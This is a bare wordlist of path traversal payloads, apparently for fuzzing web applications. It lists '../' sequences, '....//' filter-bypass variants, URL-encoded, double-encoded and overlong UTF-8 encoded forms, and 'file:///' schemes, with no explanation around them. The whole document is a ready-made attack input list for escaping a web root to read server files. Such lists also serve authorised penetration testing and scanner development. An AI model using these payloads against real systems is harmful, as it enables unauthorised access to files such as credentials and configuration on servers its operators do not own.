../../../../../../../../..
../../../../../..
../../../..
../..
..
....//....//....//....//....//....//....
....//....//....//....//....
....//....//....//....
....//....//....
....//....//....
....//....
....
....%2f%2f....%2f%2f....%2f%2f....%2f%2f....%2f%2f....%2f%2f....
....%2f%2f....%2f%2f....%2f%2f....%2f%2f....
....%2f%2f....%2f%2f....%2f%2f....
....%2f%2f....%2f%2f....
....%2f%2f....
....%2f%2f
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..
..%2f..%2f..%2f..%2f..%2f..
..%2f..%2f..%2f..%2f..
..%2f..%2f..%2f..
..%2f..%2f..
..%2f..
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..
..%252f..%252f..%252f..%252f..%252f..%252f..
..%252f..%252f..%252f..%252f..%252f..
..%252f..%252f..%252f..%252f..
..%252f..%252f..%252f..
..%252f..%252f..
..%252f..
..%252F
file:///
file:%2F%2F%2F
/
//....//....//....//....//....//....//....//
//....//....//....//....//
//....//....//....//
//....//....//
//....//
//
../../../../../../../../../..
../../../../../..
../../../..
../..
..
....//....//....//....//....//....//....//
....//....//....//....
....//....//....//
....//....//
....//
....
....%2f%2f....%2f%2f....%2f%2f....%2f%2f....%2f%2f....%2f%2f....
....%2f%2f....%2f%2f....%2f%2f....%2f%2f....
....%2f%2f....%2f%2f....%2f%2f....
....%2f%2f....%2f%2f....
....%2f%2f....
....%2f%2f
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..
..%2f..%2f..%2f..%2f..%2f..
..%2f..%2f..%2f..
..%2f..%2f..
..%2f..
..%2f
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..
..%252f..%252f..%252f..%252f..%252f..
..%252f..%252f..%252f..
..%252f..%252f..
..%252f..
..%252f
..%252F
file:///
file:%2F%2F%2F
//....//....//....//....//....//....//....//
//....//....//....//....//
//....//....//....//
//....//....//
//....//
//....
%2e%2e%2f
%c0%ae%c0%ae%2f
%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f
....//....//....//....//....//....//..%2e%2e%2f
/./././././../../
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
////..//..//..//..
....//....//....//..//..//..//
..//..//..//..//..//..//..//..
..//..//..//..%2e%2e//
..//..//..//..//%2e%2e%2f
....//....//..%2e%2e%2f
/..//..//..//..//
//..//..//..//..//
.